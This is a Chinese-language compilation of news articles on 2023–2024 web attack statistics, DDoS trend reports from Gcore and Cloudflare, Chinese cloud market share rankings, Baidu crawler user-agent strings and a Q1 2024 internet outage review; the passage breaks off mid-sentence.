全球攻击目标地域分布排序依次为APAC、LATAM、EMEA、AMER。 典型攻击分析: 扫段攻击频次快速增长,低速扫段攻击成为主流。 DNS攻击频次快速增长,攻击强度达到亿次QPS级别。 专家观点: 需要探索更高效的检测和清洗技术,例如设备厂商研制高效随路检测路由器,运营商研发端网协同防御技术。 利用行为分析算法拦截高速CC,机器学习算法精准识别低速CC。 采取多种措施增强防御,增加网段检测能力,提升攻击识别精准度。 #### 2023年全球Web应用程序攻击数超七千亿次 网站安装Web应用防火墙WAF 刻不容缓 近日,网宿科技旗下网宿安全发布《2023互联网安全报告》(下称《报告》)。《报告》显示,2023年,网宿安全平台监测到的全球Web应用程序攻击数量达到7309亿次,同比增长30%。其中,应用层DDoS攻击次数同比增长26%,针对境外目标的DDoS攻击同比增长近220%,或与企业出海趋势相关。2023年网宿安全平台监测的数据泄露事件的数量同比2022年显著增加了44%以上。此外,电商、文旅行业所遭受到的恶意Bot攻击达到了462次,占全平台Bot请求数比例为22%,相比2022年的170亿、10%分别增长了172%、120%。 值得注意的是,生成式人工智能的发展正在助长威胁态势。《报告》显示,生成式AI已经成为攻击者武器库的一部分,可以让现有攻击更隐蔽,同时还能生成攻击代码,让自动化的攻击以及漏洞利用的效率变得更高。 主机帮这一两年明显感觉到服务器运行越来越吃力,主要原因是黑客自动化攻击越来越多了,SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等黑客渗透入侵越来越多,同时还有各种DDoS攻击。 因此,网站需要一个强有力的防御软件,目前比较流行的是安装Web应用防火墙 WAF,比如百度云防护就是这类产品。百度云防护可以同时防护包括SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等问题在内的十多种黑客渗透攻击和SYN Flood、UDP Flood、ICMP Flood、TCP Flood以及CC在内的多种DDoS攻击。 有需要的同学可以了解下:https://zhujib.com/shop/26864.html #### 2023年全球移动应用发行商营收排名:腾讯字节跳动包揽前二 6 月 30 日消息,移动数据分析机构 data.ai 近日发布了《2023 移动应用发行商营收 Top 50》,腾讯连续六年位居榜首,字节跳动则跃升五位来到第二,中国厂商整体表现亮眼。 ▲ 图源 data.ai data.ai 表示,2022 年,人们每天花在移动设备上的时间增加到 5 小时,其中娱乐占 70%,以 TikTok 为首的短视频应用程序占据了用户支出的相当大份额。前 50 名的发行商中有 42 家主要通过应用内购买实现盈利,该机构预计这一趋势将持续下去。 报告特别指出,字节跳动凭借 TikTok 在 2022 年的强势表现,实现了创纪录的 33 亿美元(IT之家备注:当前约 239.25 亿元人民币)营收(此为应用营收,非公司总营收),比 2021 年翻了一番。 分区域来看,27 家总部位于亚太地区的发行商进入榜单,为顶级发行商最主要的聚集地区。分国家来看,美国拥有 17 家上榜企业,排名第一,中国则以 12 家排名第二。 榜单前十发行商如下: 1、腾讯(中国) 2、字节跳动(中国) 3、谷歌(美国) 4、动视暴雪(美国) 5、网易(中国) 6、Match Group(美国) 7、Playrix(以色列) 8、迪士尼(美国) 9、Netmarble(韩国) 10、Playtika(以色列) 上榜中国发行商如下: 1、腾讯 2、字节跳动 5、网易 11、米哈游 20、三七互娱 23、阿里巴巴 24、莉莉丝 40、百度 43、龙创悦动 47、神州泰岳 48、世纪华通 49、吉比特 #### 2023年国内比较知名的云服务商排名 以下是国内比较知名的云服务商排名: 阿里云(Alibaba Cloud):是中国领先的云计算服务商之一,提供云服务器、云数据库、云存储、人工智能等多种云计算服务。 腾讯云(Tencent Cloud):是中国知名的云计算服务提供商,提供云服务器、云数据库、云存储、人工智能等多种云计算服务。 华为云(Huawei Cloud):是华为公司旗下的云计算服务商,提供云服务器、云存储、人工智能等多种云计算服务。 百度云(Baidu Cloud):是百度公司旗下的云计算服务提供商,提供云服务器、云数据库、云存储等多种云计算服务。 京东云(JD Cloud):是京东集团旗下的云计算服务提供商,提供云服务器、云数据库、云存储等多种云计算服务。 中国移动云(CMCC Cloud):是中国移动旗下的云计算服务商,提供云服务器、云存储、云安全等多种云计算服务。 金山云(Kingsoft Cloud):是金山软件旗下的云计算服务提供商,提供云服务器、云数据库、云存储等多种云计算服务。 UCloud(优刻得):是一家专注于云计算服务的科技公司,提供云服务器、云数据库、云存储、云安全等多种云计算服务。 QingCloud(青云):是一家专注于云计算服务的公司,提供云服务器、云数据库、云存储等多种云计算服务。 以上是目前国内比较知名的云服务商排名,它们的服务范围和特点各有不同,可以根据自身需求进行选择。 #### 2023年百度蜘蛛UA大全 百度蜘蛛是什么?最近百度蜘蛛来的太频繁服务器抓爆了!最近百度蜘蛛都不来了怎么办?还有很多站点想得到百度蜘蛛的IP段,想把IP加入白名单,但IP地址范围动态变化不固定,我们无法对外公布。 但是百度蜘蛛的UA却是固定的,我们只需要知道UA就可以判断是不是百度蜘蛛了,目前UA分为移动、PC、和小程序三个应用场景,这三个渠道UA分别如下: 移动UA:  Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko)Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html) 或 Mozilla/5.0 (iPhone;CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko)Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0;+http://www.baidu.com/search/spider.html)  PC UA: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 或 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 小程序UA: Mozilla/5.0 (iPhone;CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko)Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0;Smartapp; +http://www.baidu.com/search/spider.html) #### 2023第二季度国内服务占比,阿里第一,华为第二腾讯云第三 9 月 21 日消息,根据市场调查机构 Canalys 公布的最新报告,2023 年第 2 季度国内云基础设施服务支出达到 87 亿美元,同比增长 19%。 这一大幅增长主要是由于市场领导者阿里云从其母公司阿里集团独立后,其云收入的报告方式发生了变化。如果剔除这一变化的影响,中国云服务市场的表现依然保守,增长率为中等个位数。 2023 年第二季度,中国大陆云基础设施市场的主导厂商保持不变,阿里云、华为云和腾讯云遥遥领先。三者合计占中国大陆云支出总额的 72%。 上一季度,阿里云从阿里集团分拆出来,成为独立运营的事业部,计划明年分拆上市。 因此,阿里云宣布将阿里集团内部的云消费(如淘宝和菜鸟)计入云收入。这一变化在一定程度上增加了整体市场直接销售收入的比例。 阿里云 阿里云继续领跑中国云服务市场,收入份额高达 39%。但阿里集团的重组使得阿里云的未来战略暂不明朗。本月,云计算部门更换了 CEO。随着 AI 需求的增长,阿里云推出了两款值得关注的产品:AI 音频产品 "通义听悟" 和绘画创作工具 "通义万象"。 这些是在 2023 年 4 月推出的自主研发基础模型 "同义千文" 的基础上新增的产品。 与此同时,阿里云在 2023 年第二季度阿里云合作伙伴峰会上宣布新政策,加快了在中国大陆和全球构建合作伙伴生态系统的步伐。新政策旨在通过更透明的目标、更高的合作伙伴佣金和更明确的角色定位来鼓励渠道发展。 华为云 华为云以 19% 的市场份额位居第二。本季度,华为云同比增长 14%,正在稳步缩小与阿里云的差距。华为云在 7 月份推出了自主研发的 AI 大模型 "盘古",以增强其市场竞争地位。 该 AI 基础大模型坚持 “AI for industries” 的战略,旨在将 AI 技术与各垂直行业的特定用例无缝集成。 华为还在 2023 年 8 月宣布了以盘古模式为核心的合作伙伴计划,划分了软件合作伙伴和服务合作伙伴的角色。新推出的盘古计划重点关注对合作伙伴的赋能,同时引入了具体的激励、认证和技术支持。 腾讯云 腾讯云 2023 年第二季度排名第三,市场份额为 15%,同比增长 6%。虽然腾讯云的 AI 产品发布速度稍慢于竞争对手,但它已采取措施迎头赶上。 今年 6 月,它公布了 AI 大模型的发展路线图,推出了 AI 一站式服务 "模型即服务"(MaaS),重点关注特定行业的解决方案。 路线图公布后,腾讯于 2023 年 9 月正式推出 AI 基础模型 "混元"。该基础模型还将被整合到腾讯旗下的多个旗舰 SaaS 产品中。 #### 2024 年 第二季度 中国大陆云服务阿里云、华为云、腾讯云市场份额排前三 9 月 26 日消息,Canalys 今日发布报告,2024 年第二季度,中国大陆云基础设施服务支出达到 94 亿美元(当前约 660.73 亿元人民币),同比增长 8%。阿里云、华为云和腾讯云继续主导市场,共占 71% 的市场份额。 报告称,目前领先的云厂商正专注于将 AI 与云计算深度整合,以挖掘新的增长点。AI 对云消费的影响日益显著,逐渐成为业务扩张的关键驱动力。头部云厂商提供的 AI 平台的客户群不断扩大,预计将在 2024 年下半年继续推动云消费的增长。具体排名如下: 1、阿里云在中国大陆市场保持领先地位,占据了 36% 的市场份额。 其整体增长主要由公有云业务驱动,该业务在 2024 年第二季度实现了两位数增长。 AI 产品的成功也为阿里云的增长复苏做出了重要贡献,其付费用户数量创下历史新高,季度增长率达到 200%,同时收入继续以三位数的速度增长。 这一势头促使阿里云进一步加大对 AI 的投资。2024 年 7 月,阿里云推出了 AI 助手“晓颖”,提供知识库和决策支持,实现了任务的自动学习与执行。 2、华为云巩固其作为第二大云厂商的地位,市场份额达到 19%,并保持 13% 的稳定增长。 华为云在 AI 领域稳步推进。2024 年 6 月,华为云推出了最新版本的 AI 大模型,盘古 5.0,并提供多种参数配置,以满足客户多样化的训练需求。 在渠道伙伴生态方面,华为云宣布联合 TCL、安永和软通动力,推出合作伙伴能力计划,以提升合作伙伴在产品和场景技术方面的能力。目前约有 4,500 名合作伙伴加入了该计划,与华为云合作开发了 500 多种解决方案。 3、腾讯云位居第三,市场份额达 16%。 2024 年 6 月,腾讯云宣布向新迁移的企业用户免费提供混元大模型 1 亿个 Tokens,以此吸引更多客户加入。 腾讯云还推出了包括 Pro、Standard 和 Lite 的多种版本的混元大模型,并提供免费的专属迁移工具和服务,满足用户的多样化需求。 在 2024 年 9 月的腾讯全球数字生态大会上,公司宣布其年收入超过 100 万元的人民币(约合 14.2 万美元)的合作伙伴数量增加了 150%。 认识到合作伙伴服务能力对提升渠道生态的重要性,腾讯云在 2024 年 9 月推出了新的伙伴计划,发展具有产品销售和服务经验渠道伙伴,同时试运行 MSP 服务商认证体系。 Canalys 分析师章一表示:“经过一段时间的激烈竞争,头部的云厂商已经意识到,仅通过降价无法持续推动客户支出的增长,还需要提升其服务的竞争力。他们现在正将重点转向在合作伙伴生态系统内的创新与合作,作为差异化战略,旨在吸引和留住客户。云厂商正在积极与渠道合作伙伴合作,为特定行业需求开发定制的 AI 解决方案。2024 年第二季度,通过渠道伙伴产生的收入占中国云计算总收入的 26%,预计这一比例将进一步上升。与专业合作伙伴合作,有助于云厂商提升其 AI 大模型的价值,同时解决客户对 AI 部署复杂性的担忧。” #### 2024 年上半年 DDoS 攻击激增 46%!游戏和科技行业攻击最多! 根据 Gcore 在2024年上发布的最新报告,DDoS 攻击数量相比去年同期大幅上升了46%,达到惊人的445,000次。与2023年下半年相比,这一数字也上升了34%。这不仅是一个简单的数字变化,而是反映了网络安全形势的严峻。   报告指出,攻击的峰值能力也略有增加,H12024年最高攻击达到1.7Tbps,而2023年为1.6Tbps。这样的数据意味着网络中有着海量的信息流动,想象一下,相当于212,000个高清晰度视频同时传输。如果不采取保护措施,仅300Gbps 的攻击就能让一个无防护的服务器瘫痪,造成信誉和客户的流失在被攻击的行业中,游戏和博彩行业首当冲,占据了总攻击的49%。这个行业因其竞争激烈和巨额财务风险而特别脆弱。与此同时,科技行业的攻击数量也激增,达到了15% 的份额。金融服务、电信和电子商务行业紧随其后,分别占据了12%、10% 和7% 的攻击比例。 在攻击方式上,网络层攻击主要影响到游戏、科技和电信行业,这些行业需要实时数据服务,受到攻击时后果相当严重。而应用层攻击则主要影响金融服务、电子商务和媒体行业,对交易处理和内容传递造成了很大干扰。 在攻击的持续时间方面,虽然大多数 DDoS 攻击持续时间不到10分钟,但频繁和高强度的攻击仍会造成显著的运营干扰。最持久的攻击在 H12024年持续了16个小时,这凸显了需要采取强有力和快速的应对策略。 此外,攻击者越来越倾向于个性化攻击方法,针对特定行业展开攻击。比如在游戏行业,攻击的目的是为了特定服务器的性能,迫使用户转向竞争对手,而在金融服务行业,攻击的目标往往是造成最大的干扰以便立即获得经济利益。 #### 2024 年第一季度 DDoS 威胁趋势报告 什么是 DDoS 攻击? 但首先让我们快速回顾一下。DDoS 攻击是分布式拒绝服务攻击的简称,这是一种网络攻击,旨在使网站或移动应用程序等互联网服务瘫痪或中断,导致用户无法使用。DDoS 攻击一般通过向受害者的服务器发送超出其处理能力的流量来实施。要进一步了解 DDoS 攻击和其他类型的攻击, 2024 年第一季度关键洞察2024 年第一季度的关键洞察包括: 2024 年以轰轰烈烈的方式开始:Cloudflare 的防御系统在第一季度自动缓解了 450 万次 DDoS 攻击,同比增长了 50%。 基于 DNS 的 DDoS 攻击同比增长了 80%,仍然是最主要的攻击手段。 瑞典加入北约后,针对该国的 DDoS 攻击激增了 466%,类似于芬兰 2023 年加入北约时观察到的模式。 2024 年以轰轰烈烈的方式开始 2024 年第一季度才刚刚结束,我们的自动化防御系统就已经缓解了 450 万次 DDoS 攻击,相当于我们 2023 年缓解 DDoS 攻击总数的 32%。按攻击类型细分,HTTP DDoS 攻击同比增长 93%,环比增长 51%。网络层 DDoS 攻击,即 L3/4 DDoS 攻击同比增长 28%,环比增长 5%。 2024 年第一季度:Cloudflare 缓解了 450 万次 DDoS 攻击 通过比较 HTTP DDoS 攻击和 L3/4 DDoS 攻击的合计数量,2024 年第一季度攻击总数同比增长了 50%,环比增长了 18%。 DDoS 攻击统计数据(分年度和季度) 第一季度期间,我们的系统总共缓解了 10.5 万亿个 HTTP DDoS 攻击请求。我们的系统还缓解了超过 59 PB 的 DDoS 攻击流量——仅在网络层。在这些网络层 DDoS 攻击中,许多攻击的速率超过了 1 Tbps,几乎每周都有。2024 年迄今为止我们缓解的最大规模攻击是由 Mirai 变种僵尸网络发起的。这一攻击达到 2 Tbps,目标是一家受 Cloudflare Magic Transit 保护的亚洲托管服务提供商。Cloudflare 的系统自动检测并缓解了攻击。Mirai 僵尸网络因其大规模 DDoS 攻击而臭名昭著,它主要由受感染的物联网(IoT)设备组成。在 2016 年,一个 Mirai 僵尸网络通过对 DNS 服务提供商发动攻击导致美国各地的互联网访问中断。将近八年过去了,Mirai 僵尸网络攻击仍然非常普遍。每 100 次 DDoS HTTP 攻击中有四次,每 100 次 L3/4 攻击有两次是由 Mirai 变体僵尸网络发起的。我们之所以说“变体”,是因为 Mirai 源代码已被公开,多年来出现了基于原始代码的许多变体。 Mirai 僵尸网络针对亚洲托管服务提供商发动 2 Tbps DDoS 攻击 DNS 攻击激增 80%我们于近期推出了最新的 DDoS 防御系统之一——Advanced DNS Protection 系统。这是对我们现有系统的补充,旨在防御最复杂的基于 DNS 的 DDoS 攻击。我们决定投资开发这个新系统并非心血来潮。基于 DNS 的 DDoS 攻击已成为最主要的攻击手段,在所有网络层攻击中所占比例继续增长。2024 年第一季度,基于 DNS 的 DDoS 攻击同比增长 80%,占比达到约 54%。 基于 DNS 的 DDoS 攻击(分年度和季度) 尽管 DNS 攻击激增,但值得注意的是,由于所有类型的 DDoS 攻击总体都进一步增加了,每种攻击类型的占比仍然与我们的 2023 年第四季度报告中所见相同。HTTP DDoS 攻击在 DDoS 攻击总数中的比例保持在 37%,DNS DDoS 攻击占 33%,余下 30% 为所有其他类型的 L3/4 攻击,例如 SYN Flood 和 UDP Flood。 攻击类型分布 而且事实上,SYN Flood 是第二种最常见的 L3/4 攻击。排名第三的是 RST Flood,这是另一种基于 TCP 的 DDoS 攻击。UDP Flood 排名第四,占 6%。 主要攻击手段 在分析最常见的攻击手段时,我们还会查看那些增长最快、但不一定进入前十名的攻击手段。在增长最快的攻击手段(新兴威胁)中,Jenkins Flood 季度环比增长超过 826%。Jenkins Flood 是一种 DDoS 攻击,利用 Jenkins 自动化服务器中的漏洞,特别是通过 UDP 多播/广播和 DNS 多播服务。攻击者可以向 Jenkins 服务器的公共 UDP 端口发送精心制作的小型请求,导致服务器以不合比例的大量数据进行响应。此举可显著放大流量,使目标网络不堪重负并导致服务中断。Jenkins 在 2020 年通过在后续版本中默认禁用这些服务来解决了这个漏洞(CVE-2020-2100)。然而,如我们所见,即使 4 年后,这个漏洞仍在被滥用以发动 DDoS 攻击。 季度环比增长最快的攻击手段 HTTP/2 Continuation Flood 另一种值得讨论的攻击手段是 HTTP/2 Continuation Flood。研究人员 Bartek Nowotarski 在 2024 年 4 月 3 日 发现并公开的一个漏洞使这种攻击手段成为可能。HTTP/2 Continuation Flood 漏洞的目标是未正确处理 HEADERS 和多个 CONTINUATION 帧的 HTTP/2 协议实现。威胁行为者发送一系列不带 END_HEADERS 标志的 CONTINUATION 帧,导致潜在的服务器问题,例如内存不足崩溃或 CPU 耗尽。HTTP/2 Continuation Flood 可以做到通过仅允许单台机器就能够破坏使用 HTTP/2 的网站和 API,但由于 HTTP 访问日志中没有可见的请求,这种攻击难以被发现。这个漏洞构成的潜在严重威胁比之前已知的 HTTP/2 Rapid Reset 更具破坏性,这种攻击手段导致了历史上一些最大规模的 HTTP/2 DDoS 攻击活动。其中一次活动中,数千次超大规模 DDoS 攻击以 Cloudflare 为目标。这些攻击的速率高达数百万次请求 /秒(rps)。根据 Cloudflare 记录,本轮活动的平均攻击速率为 3000 万 rps。其中大约 89 次攻击的峰值超过 1 亿 rps,我们看到的规模最大的一次攻击达到 2.01亿 rps。 2023 年第三季度的 HTTP/2 Rapid Reset 超大规模 DDoS 攻击活动 Cloudflare 的网络、其 HTTP/2 实现,以及使用我们的 WAF/CDN 服务的客户不受此漏洞的影响。此外,我们目前没有发现互联网上有任何威胁行为者利用此漏洞。多个 CVE 已被分配给受此漏洞影响的各种 HTTP/2 实现。卡内基梅隆大学的 Christopher Cullen 发布的一个 CERT 警报( Bleeping Computer 对此进行了报道)已经列出了各种 CVE: 受影响的服务CVE详情Node.js HTTP/2 服务器CVE-2024-27983发送少数几个 HTTP/2 帧可造成竞态条件和内存泄漏,可能导致拒绝服务事件。Envoy 的 oghttp 编解码器CVE-2024-27919超出标头映射限制时不重置请求可造成无限的内存消耗,可能导致拒绝服务事件。Tempesta FWCVE-2024-2758其速率限制对空的 CONTINUATION 帧洪水并不完全有效,可能导致拒绝服务事件。amphp/httpCVE-2024-2653它在无界缓冲区中收集 CONTINUATION 帧如果超过标头大小限制则有内存不足 (OOM) 崩溃的风险可能导致拒绝服务事件。Go 的 net/http 和 net/http2 包CVE-2023-45288允许攻击者发送任意大的标头集,造成 CPU 消耗过高,可能导致拒绝服务事件。nghttp2 库CVE-2024-28182涉及使用 nghttp2 库的实现,其继续接收 CONTINUATION 帧,在没有适当的流重置回调的情况下,可能导致拒绝服务事件。Apache HttpdCVE-2024-27316可会发送大量未设置 END_HEADERS 标志的 CONTINUATION 帧,造成请求的不当终止,可能导致拒绝服务事件。Apache Traffic ServerCVE-2024-31309HTTP/2 CONTINUATION 洪水可造成服务器资源消耗过多,可能导致拒绝服务事件。Envoy 版本 1.29.2 或更早CVE-2024-30255在 CONTINUATION 帧洪水期间消耗大量服务器资源,可造成 CPU 耗尽,进而可能导致拒绝服务事件。 受攻击最多的行业 在分析攻击统计数据时,我们使用系统中记录的客户行业来确定受攻击最多的行业。2024 年第一季度,北美地区受到最多 HTTP DDoS 攻击的行业是营销和广告行业。在非洲和欧洲,信息技术和互联网行业受到最多攻击。在中东,受攻击最多的行业是计算机软件。亚洲受攻击最多的行业是游戏和泛娱乐。在南美,受攻击最多的是银行、金融服务和保险 (BFSI)。最后(但并非最不重要),大洋洲受到最多攻击的行业是电信。 受到最多 HTTP DDoS 攻击的行业(分地区) 在全球范围内,游戏和泛娱乐是 HTTP DDoS 攻击第一大目标。Cloudflare 缓解的每 100 个 DDoS 请求中,超过 7 个是针对游戏和泛娱乐行业。第二位是信息技术和互联网行业,第三位是营销和广告行业。 受 HTTP DDoS 攻击最多的行业 信息技术和互联网行业是网络层 DDoS 攻击的第一大目标,占网络层 DDoS 攻击字节总数的 75%。这一巨大比例的一个可能解释是信息技术和互联网公司可成为攻击的“超级聚合者”,它们受到的 DDoS 攻击实际上是针对其最终客户的。其次是电信、银行、金融服务和保险 (BFSI)、游戏和泛娱乐以及计算机软件,合计占 3%。 受 L3/4 DDoS 攻击最多的行业 通过将攻击流量除以给定行业的总流量来对数据进行标准化,我们会得到完全不同的状况。在 HTTP 方面,律师事务所和法律服务是受到最多攻击的行业,其流量中超过 40%是 HTTP DDoS 攻击流量。生物技术行业位居第二,HTTP DDoS 攻击流量占比达到 20%。第三位是非营利组织, HTTP DDoS 攻击占比 13%。航空和航天排名第四,前十的其他行业依次为交通运输、批发、政府关系、电影、公共政策和成人娱乐。 受 HTTP DDoS 攻击最多的行业(标准化后) 回到网络层,标准化后信息技术和互联网仍然是受到 L3/4 DDoS 攻击最多的行业,其流量中近三分之一为攻击流量。第二位是纺织行业,攻击流量占比为 4%。土木工程排名第三,前十的其他行业依次是银行、金融服务和保险(BFSI)、军事、建筑、医疗器械、国防和航天、游戏和泛娱乐,最后是零售。 受 L3/4 DDoS 攻击最多的行业(标准化后) DDoS 攻击的最大来源 在分析 HTTP DDoS 攻击的来源时,我们通过查看源 IP 地址以确定这些攻击的来源位置。某个国家/地区成为大量攻击的来源地,表明在虚拟专用网络 (VPN) 或代理端点后面很可能存在大量僵尸网络节点,可被攻击者利用来混淆其来源。在 2024 年第一季度,美国是 HTTP DDoS 攻击流量的最大来源,所有 DDoS 攻击请求的五分之一来自美国 IP 地址。中国位居第二,其后是德国、印度尼西亚、巴西、俄罗斯、伊朗、新加坡、印度和阿根廷。 HTTP DDoS 攻击的主要来源 在网络层,源 IP 地址可被伪造。因此我们不依赖于 IP 地址来了解来源,而是使用我们接收到攻击流量的数据中心位置。由于 Cloudflare 的网络覆盖全球 310 多个城市,我们可以获得准确的地理位置。通过使用我们的数据中心位置,我们可以看到,2024 年第一季度期间超过 40% 的 L3/4 DDoS 攻击流量被我们的美国数据中心接收,使美国成为 L3/4 攻击的最大来源。远远落后的第二位是德国,占 6%,其后是巴西、新加坡、俄罗斯、韩国、中国香港、英国、荷兰和日本。 L3/4 DDoS 攻击的主要来源 通过将攻击流量除以给定国家或地区的总流量来标准化数据,我们得到一个完全不同的排名。来自直布罗陀的 HTTP 流量中有近三分之一是 DDoS 攻击流量,使其成为最大的来源。第二名是圣赫勒拿,其后是英属维尔京群岛、利比亚、巴拉圭、马约特、赤道几内亚、阿根廷和安哥拉。 HTTP DDoS 攻击的主要来源(标准化后) 回到网络层,标准化处理后的情况也大不相同。在我们位于津巴布韦的数据中心,所接收流量中近 89% 是 L3/4 DDoS 攻击。在巴拉圭,攻击流量占比超过 56%,其后是蒙古,占比接近 35%。排在前列的其他地点包括摩尔多瓦、刚果民主共和国、厄瓜多尔、吉布提、阿塞拜疆、海地和多米尼加共和国。 L3/4 DDoS 攻击的主要来源(标准化后) 受攻击最多的地点 在分析针对我们客户的 DDoS 攻击时,我们使用客户的账单国家/地区来确定“受攻击的国家/地区”。2024 年第一季度,美国是受 HTTP DDoS 攻击最多的国家。Cloudflare 缓解的 DDoS 请求中,大约十分之一针对美国。中国大陆位居第二,其后是加拿大、越南、印度尼西亚、新加坡、中国香港、中国台湾、塞浦路斯和德国。 受到最多 HTTP DDoS 攻击的国家和地区 通过将攻击流量除以给定国家或地区的总流量来标准化数据时,排名也变得截然不同。流向尼加拉瓜的 HTTP 流量中超过 63% 是 DDoS 攻击流量,使其成为受攻击最多的国家/地区。第二位是阿尔巴尼亚,其后是约旦、几内亚、圣马力诺、格鲁吉亚、印度尼西亚、柬埔寨、孟加拉国和阿富汗。 受到最多 HTTP DDoS 攻击的国家/地区(标准化后) 在网络层,中国大陆是受攻击最多的地区。2024 年第一季度 Cloudflare 缓解的所有 DDoS 攻击中,有 39% 是针对 Cloudflare 的中国客户。中国香港位居第二,其后是中国台湾、美国和巴西。 受 L3/4 DDoS 攻击最多的国家和地区 回到网络层,标准化后中国香港成为受攻击最多的地区。在发送到香港的所有流量中,超过 78% 为 L3/4 DDoS 攻击流量。位居第二的是中国大陆,DDoS 占比 75%。其后是哈萨克斯坦、泰国、圣文森特和格林纳丁斯、挪威、中国台湾、土耳其、新加坡和巴西。 受 L3/4 DDoS 攻击最多的国家和地区(标准化后) #### 2024 年第一季度全球互联网中断事件 2024 年第一季度伊始,互联网发生了多起中断事件。陆地和海底电缆的损坏在多个地方造成了问题,而与持续中地缘政治冲突相关的军事行动影响了其他地区的连接。 几个非洲国家以及巴基斯坦的政府下令关闭互联网,主要针对移动网络连接。 被称为Anonymous Sudan的恶意行为者宣布对导致以色列和巴林互联网连接中断的网络攻击负责。设施维护和停电迫使用户下线,导致流量明显下降。同时,更不寻常的是,RPKI 、DNS 和 DNSSEC 问题成为多个网络服务提供商用户连接中断的其中一些技术问题 。正如我们过去所指出的,这篇文章旨在作为观察到的干扰情况的总结性概述,而不是本季度所发生问题的详尽或完整清单。电缆切断 Moov Africa Tchad 1 月 10 日喀麦隆发生的光纤受损事件,导致 AS327802 (Moov Africa Tchad / Millicom)(乍得电信服务提供商)的用户连接进一步中断。Moov Africa Tchad 发布的 Facebook 帖子称(译文), “2024 年 1 月 10 日下午,原因是来自喀麦隆的光纤(乍得通过该光纤接入互联网)被切断,而来自苏丹的光纤一段时间内不可用。” 目前尚不清楚所提到的电缆切断是发生在喀麦隆还是乍得,而提及的苏丹光纤问题可能是 我们在 2023 年第四季度贴文中所介绍过的光纤切断。 作为内陆国家,乍得依赖于通过/到达邻国的陆地互联网连接,AfTerFibre 电缆地图显示了对通过喀麦隆和苏丹的有限电缆连接的依赖。如下图表显示从 1 月 10 日中午 (UTC) 开始,Moov Africa Tchad 流量中断了超过 12 个小时,而且中断在国家/地区层面也很明显。从路由的角度来看,光纤切断也导致了显著的波动,在中断期间,公告 IPv4 地址空间数量在网络和国家层面频繁变化。 在 1 月 11 日上午 (UTC) 也观察到了第二次严重程度较低的中断。据报道该次中断的原因是 Anonymous Sudan 组织发动的一次网络攻击,其目标是 AS328594 (SudaChad Telecom), Moov Africa Tchad 的上游提供商 。 Orange Burkina Faso 2 月 15 日,在 AS37577 (Orange Burkina Faso) 网络上观察到一次短暂(约 30 分钟)但严重的完全互联网中断。根据该提供商在社交媒体上发布的公告译文,“事件原因是光纤切断,导致某些客户的互联网服务中断。 ” Orange 没有具体说明这是一次更局部的光纤切断,还是穿越该国的地面光纤受到损坏。事件导致网络完全离线,期间该 ASN 的公告 IPv4 地址空间数量在此期间降至零。 MTN Nigeria MTN Nigeria于 2 月 28 日通过社交媒体告知客户“由于多次光纤切断导致服务中断影响语音和数据服务,您在连接网络方面遇到了困难。” 一份发布的报告描述了这一影响,指出“全国数百万客户受到长达数小时的中断影响,尤其是在拉各斯。” 当地时间 13:30 - 20:30(12:30 - 19:30 UTC),连接中断了约 7 个小时。该提供商在当地时间午夜前发布了后续通知,声明服务已完全恢复。 Digicel Haiti 3 月 2/3 日 ,AS27653 (Digicel Haiti) 发生一次持续 16 小时的互联网中断,原因是与推翻总理 Ariel Henry 的企图相关的暴力事件导致两次光纤切断 。 从 3 月 2 日当地时间 22:00 左右(3 月 3 日 03:00)开始,观察到持续大约 9 个小时的完全中断。流量在大约两个半小时内有所恢复,随后是一次持续 3 个小时的接近完全中断。在长达 9 小时的中断期间,Digicel Haiti 实际上从互联网上消失了,因为在此期间该网络没有公告任何 IPv4 或 IPv6 地址空间。 SKY (菲律宾) 3 月 18 日,在菲律宾的 AS23944 (SKY) 网络观察到一次短暂的流量中断,可能与光纤切断有关。SKY 在社交媒体发布的通告中表示 “在马里基纳、帕西格和奎松市的几个地区,SKY 服务目前受到光纤切断问题的影响”,并列出了 45 个受影响的地区。 流量在当地时间 20:00 至 21:00(12:00 -13:00 UTC)期间受影响最明显,直至过数小时后才完全恢复。据观察,光纤切断仅对路由造成了轻微影响。 多个非洲国家 3 月 14 日,非洲西海岸附近多条海底电缆受损,影响了非洲西部和南部多个国家的互联网连接。据报道这次破坏是由水下落石造成的,除了互联网连接中断外,还导致 Microsoft Azure 和 Office 365 云服务的可用性问题。非洲海岸到欧洲 (ACE) 、大西洋海底电缆 3/西非海底电缆 (SAT-3/WASC) 、西非电缆系统 (WACS)和MainOne电缆均受损,影响到 13 个非洲国家,包括贝宁、布基纳法索、喀麦隆、科特迪瓦、冈比亚、加纳、几内亚、利比里亚、纳米比亚、尼日尔、尼日利亚、南非和多哥。 在尼日尔 、几内亚和冈比亚观察到的中断时间相对较短,介乎不到一小时到大约两小时不等。 然而,在多哥 、利比里亚和加纳等国家,中断持续了多日,流量花了几周时间才恢复到之前观察到的峰值水平。 受影响国家的运营商试图通过将流量转移到 Google 的Equiano海底电缆(据称该电缆的流量增加了 4 倍)和摩洛哥的 Maroc Telecom West Africa海底电缆来维持可用性。 到 4 月 6 日,SAT-3 电缆的服务已完全恢复,ACE的维修于 4 月 17 日完成,WACS和MainOne的维修预计于 4 月 28 日完成。更多详情和观察结果,请参阅我们的博客文章《海底电缆故障导致多个非洲国家的互联网中断》 。 红海 2 月 24 日,穿越红海的三条海底电缆受损:Seacom/Tata 电缆、Asia Africa Europe-1(AAE-1) 和Europe India Gateway(EIG)。据信这些电缆是被Rubymar号货船的锚割断的。这艘货船在 2 月 18 日被弹道导弹击中并受损。在中断发生时, Seacom确认其电缆受损,而另外两条电缆的所有者均未发布类似的确认。虽然电缆切断据称影响了东非的几个国家,包括坦桑尼亚、肯尼亚、乌干达和莫桑比克,在Cloudflare Radar上没有观察到这些国家的流量出现下降。 军事行动 苏丹 2 月 2 日,Cloudflare 观察到AS15706 (Sudatel)和AS36972 (MTN Sudan)流量下降,在 2 月 7 